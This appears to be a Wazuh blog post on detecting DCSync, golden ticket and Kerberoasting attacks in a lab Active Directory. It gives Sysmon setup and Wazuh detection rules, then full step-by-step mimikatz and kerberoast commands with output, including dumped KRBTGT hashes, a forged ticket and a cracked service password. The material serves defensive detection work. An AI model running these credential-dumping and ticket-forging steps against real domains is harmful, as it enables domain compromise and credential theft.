How to detect Active Directory attacks with Wazuh [Part 1 of 2]
Active Directory (AD) is the most widely used Identity and Access Management (IAM) technology for Windows domain networks in modern organizations. It is adopted by small, medium, and large enterprises to manage enterprise networks, so it is an ideal target for attackers. AD is a perfect target for attackers because many system administrators use it to manage enterprise networks.
To defend against threats, organizations need to implement the principle of defense in depth. Implementing several layers of defense mechanisms ensures that when the initial line of defense fails and hackers get access to Active Directory, the consequences are limited and contained.
In this blog post, we demonstrate how to simulate and detect the following AD attacks:
- DCSync attacks
- Golden ticket attacks
- Kerberoasting attacks
- A Centos 7 endpoint with Wazuh 4.3.10 installed. You can install the Wazuh central components using this Quickstart installation guide.
- A Windows Server 2022 domain controller running the Wazuh agent 4.3.10. This domain controller hosts the Active Directory infrastructure. You can use this Wazuh agent installation guide for this. In this blogpost we use the domain name
wazuhtest.com. - A Windows 10 Pro edition endpoint running Wazuh agent 4.3.10. The Windows 10 endpoint is registered to the Active Directory and serves as the attacker’s initial foothold after compromise.
- A user account on the Active Directory with local administrative privilege on the compromised Windows 10 endpoint. This user account should have “Replicating Directory Changes” and “Replicating Directory Changes All” privileges to facilitate DCsync attack. This account is the compromised user account used to simulate the attacks.
- A service account on the Active Directory with associated
servicePrincipalName(SPN). This account is the target of the kerberoasting attack. You can follow this SPN guide to set this up. - A Mimikatz copy in the compromised Windows 10 endpoint. To run the
mimikatz.exe, you can navigate tomimikatz_trunk/x64(orx32, depending on your system architecture). Mimikatz is required to perform the attack simulations. - A kerberoast copy from Github and a password word list to perform the kerberoast attack. This password list must contain the password to compromise.
- The latest version of Python to run the
tgsrepcrack.pyscript during kerberoasting attack simulation. Ensure to set the environment variable correctly.
Active Directory attacks: Infrastructure setup
We use the following setup to simulate AD attacks and show how Wazuh can detect them:
Detection rules
To detect AD attacks, we create rules on the Wazuh server to detect IoCs in Windows security events and system events monitored by Sysmon.
Sysmon integration
1. Download Sysmon from the Microsoft Sysinternals page with the configuration file sysmonconfig.xml on the Windows 2022 domain controller and the compromised Windows 10 endpoint.
2. Run the following command to install Sysmon with the downloaded configuration file via PowerShell (run as administrator):
.\sysmon.exe -accepteula -i sysmonconfig.xml
3. Configure the Wazuh agents to collect Sysmon events by adding the following settings to the agent configuration file in “C:\Program Files (x86)\ossec-agent\ossec.conf“:
<ossec_config>
<localfile>
<location>Microsoft-Windows-Sysmon/Operational</location>
<log_format>eventchannel</log_format>
</localfile>
</ossec_config>
4. Apply the changes by restarting the agents using this PowerShell command:
Restart-Service -Name wazuh
Wazuh server configuration
1. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server to generate alerts on the Wazuh dashboard whenever an attacker performs any of the attacks mentioned above,:
<group name="security_event, windows,">
<!-- This rule detects DCSync attacks using windows security event on the domain controller -->
<rule id="110001" level="12">
<if_sid>60103</if_sid>
<field name="win.system.eventID">^4662$</field>
<field name="win.eventdata.properties" type="pcre2">{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}|{19195a5b-6da0-11d0-afd3-00c04fd930c9}</field>
<options>no_full_log</options>
<description>Directory Service Access. Possible DCSync attack</description>
</rule>
<!-- This rule ignores Directory Service Access originating from machine accounts containing $ -->
<rule id="110009" level="0">
<if_sid>60103</if_sid>
<field name="win.system.eventID">^4662$</field>
<field name="win.eventdata.properties" type="pcre2">{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}|{19195a5b-6da0-11d0-afd3-00c04fd930c9}</field>
<field name="win.eventdata.SubjectUserName" type="pcre2">\$$</field>
<options>no_full_log</options>
<description>Ignore all Directory Service Access that is originated from a machine account containing $</description>
</rule>
<!-- This rule detects Keberoasting attacks using windows security event on the domain controller -->
<rule id="110002" level="12">
<if_sid>60103</if_sid>
<field name="win.system.eventID">^4769$</field>
<field name="win.eventdata.TicketOptions" type="pcre2">0x40810000</field>
<field name="win.eventdata.TicketEncryptionType" type="pcre2">0x17</field>
<options>no_full_log</options>
<description>Possible Keberoasting attack</description>
</rule>
<!-- This rule detects Golden Ticket attacks using windows security events on the domain controller -->
<rule id="110003" level="12">
<if_sid>60103</if_sid>
<field name="win.system.eventID">^4624$</field>
<field name="win.eventdata.LogonGuid" type="pcre2">{00000000-0000-0000-0000-000000000000}</field>
<field name="win.eventdata.logonType" type="pcre2">3</field>
<options>no_full_log</options>
<description>Possible Golden Ticket attack</description>
</rule>
</group>
2. Restart the Wazuh server to apply the configuration changes:
systemctl restart wazuh-manager
Active Directory attacks simulation
In this section we show how to simulate some common active directory attacks, as mentioned earlier. To successfully simulate the attacks, the attacker compromises a user account with local administrator privileges on the Windows 10 endpoint.
Note
The <USERNAME> variable represents the compromised user account name on the active directory, which you use to simulate attacks.
DCSync attack simulation
DCSync is a credential dumping technique used by threat actors to compromise domain users’ credentials. This attack abuses the Directory Replication Service (DRS) remote protocol domain controllers used for synchronization and replication. To successfully perform this attack, a threat actor must have access to a domain user account with “Replicating Directory Changes” and “Replicating Directory Changes All” privileges. The following step shows how to perform a DCSync attack:
1. Run mimikatz as administrator and run the following command in the mimikatz console to replicate KRBTGT credentials from the Active Directory.
lsadump::dcsync /domain:wazuhtest.com /user:krbtgt
[DC] 'wazuhtest.com' will be the domain
[DC] 'Windows2022DC.wazuhtest.com' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/15/2022 10:06:35 PM
Object Security ID : S-1-5-21-1860018313-2454207738-2274937249-502
Object Relative ID : 502
Credentials:
Hash NTLM: 5a5b25ba4501379b5eca5e4a49c11597
ntlm- 0: 5a5b25ba4501379b5eca5e4a49c11597
lm - 0: b33b34e78d3806e0d4e8b125e31a9cc8
We can see the NTLM hash of the KRBTGT account is 5a5b25ba4501379b5eca5e4a49c11597.
The obtained KRBTGT account credential is a prerequisite to perform a Golden ticket attack.
Golden ticket attack simulation
Golden tickets are forged authentication tickets that abuse the Kerberos protocol that encrypts and signs messages using shared secrets. Kerberos tickets are generated using the password hash of the KRBTGT user account. These tickets can be used to access systems and data because the tickets are trusted and valid for authentication.
Note
The NTLM password hash of the KRBTGT account obtained in the DCSync attack is used to facilitate the Golden ticket attack.
1. Run mimikatz as administrator and run the following command to forge Kerberos tickets using the NTLM hash of the KRBTGT account obtained during the DCSync attack.
mimikatz # kerberos::golden /domain:wazuhtest.com /sid:S-1-5-21-1860018313-2454207738-2274937249 /rc4:<Hash NTLM of KRBTGT> /user:FakeUser /groups:513,2668 /ptt
User : FakeUser Domain : wazuhtest.com (WAZUHTEST) SID : S-1-5-21-1860018313-2454207738-2274937249 User Id : 500 Groups Id : *513 2668 ServiceKey: 40364adcda7fec186497af461dbf990bf42481de4da960fb30b1556e82b2b953 - aes256_hmac Lifetime : 12/2/2022 11:17:34 AM ; 11/29/2032 11:17:34 AM ; 11/29/2032 11:17:34 AM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'FakeUser @ wazuhtest.com' successfully submitted for current session
We can see from the output that the golden ticket was successfully submitted for the current session.
2. Run the following command to open a command prompt session authenticated with the forged Kerberos ticket.
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7BB9B95E0
3. Run the klist command to verify the forged ticket is currently loaded into memory for the current session.
C:\Users\<USERNAME>\Downloads\mimikatz_trunk\x64> klist
We can see the ticket currently loaded in the memory has the client as Client: FakeUser @ wazuhtest.com.
Current LogonId is 0:0x186c51
Cached Tickets: (1)
#0> Client: FakeUser @ wazuhtest.com
Server: krbtgt/wazuhtest.com @ wazuhtest.com
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 12/2/2022 11:17:34 (local)
End Time: 11/29/2032 11:17:34 (local)
Renew Time: 11/29/2032 11:17:34 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
Kerberoasting attack simulation
Kerberoasting is an attack technique that involves an attacker abusing the privilege given to authenticated users to request a Ticket Granting Service (TGS) ticket for any servicePrincipalName (SPN) from a domain controller. The ticket may be encrypted with a Cipher suite like RC4, HMAC, or MD5 using the password hash of the service account associated with the SPN. The threat actor extracts the password hash of the ticket and attempts to crack the password offline.
You will need a copy of kerberoast from Github, Mimikatz, and a password word list to simulate the kerberoasting attack.
1. Run PowerShell as administrator and change the current directory to the kerberoast-master directory. Then run the GetUserSPNs.ps1 command to enumerate the ServicePrincipalName of service accounts on the Active Directory.
PS C:\Windows\system32> cd C:\Users\<USERNAME>\Downloads\kerberoast-master PS C:\Users\<USERNAME>\Downloads\kerberoast-master> .\GetUserSPNs.ps1
ServicePrincipalName : http/Windows10 Name : Test-Svc SAMAccountName : Test-Svc MemberOf : PasswordLastSet : 11/25/2022 2:18:49 AM ServicePrincipalName : kadmin/changepw Name : krbtgt SAMAccountName : krbtgt MemberOf : CN=Denied RODC Password Replication Group,CN=Users,DC=wazuhtest,DC=com PasswordLastSet : 11/15/2022 10:06:35 PM
We can see that the ServicePrincipalName of the Test-Svc service account is http/Windows10.
2. Run the command below to request an RC4-encrypted Kerberos TGS ticket.
PS C:\Users\<USERNAME>\Downloads\kerberoast-master> Add-Type -AssemblyName System.IdentityModel PS C:\Users\<USERNAME>\Downloads\kerberoast-master> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "http/Windows10"
Id : uuid-28ff0ce8-06df-49c9-a6eb-b20d1391e56c-1
SecurityKeys : {System.IdentityModel.Tokens.InMemorySymmetricSecurityKey}
ValidFrom : 12/2/2022 12:29:20 PM
ValidTo : 12/2/2022 10:26:08 PM
ServicePrincipalName : http/Windows10
SecurityKey : System.IdentityModel.Tokens.InMemorySymmetricSecurityKey
3. Launch mimikatz on the PS command prompt and run the kerberos::list /export command to dump the tickets to the kerberoast-master directory on the endpoint.
PS C:\Users\<USERNAME>\Downloads\kerberoast-master> C:\Users\<USERNAME>\Downloads\mimikatz_trunk\x64\mimikatz.exe mimikatz # kerberos::list /export
[00000000] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 12/2/2022 12:26:08 PM ; 12/2/2022 10:26:08 PM ; 12/9/2022 12:26:08 PM Server Name : krbtgt/WAZUHTEST.COM @ WAZUHTEST.COM Client Name : <USERNAME> @ WAZUHTEST.COM Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; * Saved to file : 0-40e10000-<USERNAME>@krbtgt~WAZUHTEST.COM-WAZUHTEST.COM.kirbi [00000001] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 12/2/2022 12:29:20 PM ; 12/2/2022 10:26:08 PM ; 12/9/2022 12:26:08 PM Server Name : http/Windows10 @ WAZUHTEST.COM Client Name : <USERNAME> @ WAZUHTEST.COM Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; * Saved to file : 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi
4. Exit mimikatz and run the Get-ChildItem command to view the exported tickets in the kerberoast-master directory.
mimikatz # exit Bye! PS C:\Users\<USERNAME>\Downloads\kerberoast-master> Get-ChildItem
We can see the ticket generated for the test-svc service account saved as 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi.
Directory: C:\Users\<USERNAME>\Downloads\kerberoast-master Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/2/2022 12:51 PM examples -a---- 12/2/2022 12:56 PM 1452 0-40e10000-<USERNAME>@krbtgt~WAZUHTEST.COM-WAZUHTEST.COM.kirbi -a---- 12/2/2022 12:56 PM 1554 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi -a---- 12/2/2022 12:56 PM 1578 -a---- 11/25/2022 3:46 AM 1387 ticket.kirbi -a---- 11/25/2022 3:24 AM 865 wordlist.txt
5. Run the following command replacing wordlist.txt with your own password list file and replacing the target ticket to crack the password of the target service account with your own. The tgsrepcrack.py script is included in the kerberoast package. You can download a dictionary of potential passwords online or create a simple password list using notepad. You can achieve this by typing potential passwords in a notepad and saving the file as a .txt file.
PS C:\Users\<USERNAME>\Downloads\kerberoast-master> ./tgsrepcrack.py wordlist.txt 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi
USE HASHCAT, IT'S HELLA FASTER!! Cracking 1 tickets... found password for ticket 0: Password20 File: 1-40a10000-<USERNAME>@http~Windows10-WAZUHTEST.COM.kirbi Successfully cracked all tickets PS C:\Users\<USERNAME>\Downloads\kerberoast-master>
Detection result
After simulating the attacks, the alerts are generated on the Wazuh dashboard based on the events from the Windows 2022 domain controller:
Conclusion
Active Directory is a core component that facilitates the centralized administration of identities and resources in any organization. It has become a target for most attackers due to its wide adoption and uses. Hence, it is necessary to detect and defend against these attacks. It is essential to detect early indications of lateral movement and privilege escalation as it aids in preventing attacks.
This blog shows how Wazuh detects some common Active Directory attacks using Windows security logs and events captured on Sysmon.